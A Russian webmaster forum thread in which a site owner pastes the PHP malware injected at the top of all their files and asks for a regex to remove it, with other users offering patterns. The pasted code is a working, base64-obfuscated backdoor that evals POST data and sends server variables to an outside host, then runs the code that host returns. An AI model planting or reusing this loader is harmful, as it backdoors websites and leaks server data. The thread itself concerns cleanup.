X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Добавить ответ в эту тему
> Регулярка php для поиска вируса
dspu
dspu
Topic Starter сообщение 27.9.2021, 13:08; Ответить: dspu
Сообщение #1


Подхватил вирус, в начале всех файлов прописан php код. Решения в интернете есть, но не могу подобрать регулярку для удаления.
Код вируса:
Код
<?php /*5938291*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2
ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zK
CRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaG
VkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGl
mKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1
ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHS
EtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KCi8vaWYgKHN0cnBvcygkX1NFUlZFUl
siSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJ
vcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0g
MTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbI
khUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdC
IsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54Iiw
gIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJm
aW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc
3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcm
VzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiA
pIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcp
KSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUV
FBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1
JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICB
vciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAo
JF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZ
m9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbm
Ridi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29
udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0
aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ
2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMS
BGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclx
uIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAg
ICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9Z
mlsZV9nZXRfY29udGVudHMoImh0dHA6Ly9ub3Jtc3RsLm5ldC9zZXNzaW9uLnBocD9pZCIsIGZhbHNlIC
wkY29udGV4dF9qaGtiKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk
7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsx
NzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7I
HBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVD
snOzwvc2NyaXB0PiI7IH0gO307CiB9CiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*5938291*/ ?>


Регулярка
Код
$rmcode = `find $dir -name "*.php" -type f |xargs sed -i 's#<?php /(.*)/(.*)base64_decode(\'aWY(.*)?>##g' 2>&1`;

не срабатывает.
Помогите, пожалуйста. Как выделить этот кусок кода целиком?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ekvador
ekvador
сообщение 27.9.2021, 19:03; Ответить: ekvador
Сообщение #2


Код
\/\*5938291\*\/[^&]*\/\*5938291\*\/
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dspu
dspu
Topic Starter сообщение 27.9.2021, 19:29; Ответить: dspu
Сообщение #3


ekvador, код в кавычках /*5938291*/ всегда разный

Сообщение отредактировал dspu - 27.9.2021, 19:30
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
eugenepetrov2021
eugenepetrov2021
сообщение 22.10.2021, 10:27; Ответить: eugenepetrov2021
Сообщение #4


а кусок кода в символов сто есть одинаковый? тогда просто скопируйте его в регулярку которую вам дали выше


--------------------
Опытный веб-разработчик.
Знакомлюсь с профи в гемблинге, бинарных опционах, хайпах и трафике для личных проектов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Добавить ответ в эту тему
Быстрый ответ
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) GuruLeads — финансовая партнерская сеть открывает свои двери для арбитражников!
5 GuruLeads 1351 Вчера, 19:16
автор: GuruLeads
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыWAP.SeriousPartner.biz - во всем виноват WAP-Click! До 10р ребилл, Exclusive LP для ТОПов!
55 RomaSerious 23128 Вчера, 17:04
автор: RomaSerious
Горячая тема (нет новых ответов) LITE.HOST - хостинг для тех, кто любит не переплачивать
39 akkyoh 13495 Вчера, 2:53
автор: akkyoh
Открытая тема (нет новых ответов) Mostbet Partners - партнерка для монетизации азартного трафика
14 mostbetpartners 4644 25.11.2021, 19:33
автор: mostbetpartners
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБукварикс - бесплатная программа для быстрого подбора ключевых слов
275 Bukvarix 180223 25.11.2021, 15:53
автор: Bukvarix


 



RSS Текстовая версия Сейчас: 27.11.2021, 15:44
Дизайн